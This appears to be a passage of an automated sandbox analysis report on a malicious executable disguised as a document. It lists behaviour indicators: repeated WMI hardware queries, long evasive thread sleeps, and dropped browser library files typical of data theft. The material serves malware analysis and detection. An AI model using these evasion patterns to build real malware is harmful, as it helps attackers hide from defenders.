                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\SysWOW64\cmd.exe TID: 1033720Thread sleep count: 3341 > 30
                      Source: C:\Windows\SysWOW64\cmd.exe TID: 1033720Thread sleep time: -40092000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe TID: 1033976Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exe TID: 1033756Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exe TID: 118108Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 3341
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWindow / User API: threadDelayed 9412
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeAPI coverage: 3.7 %
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IconLib.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
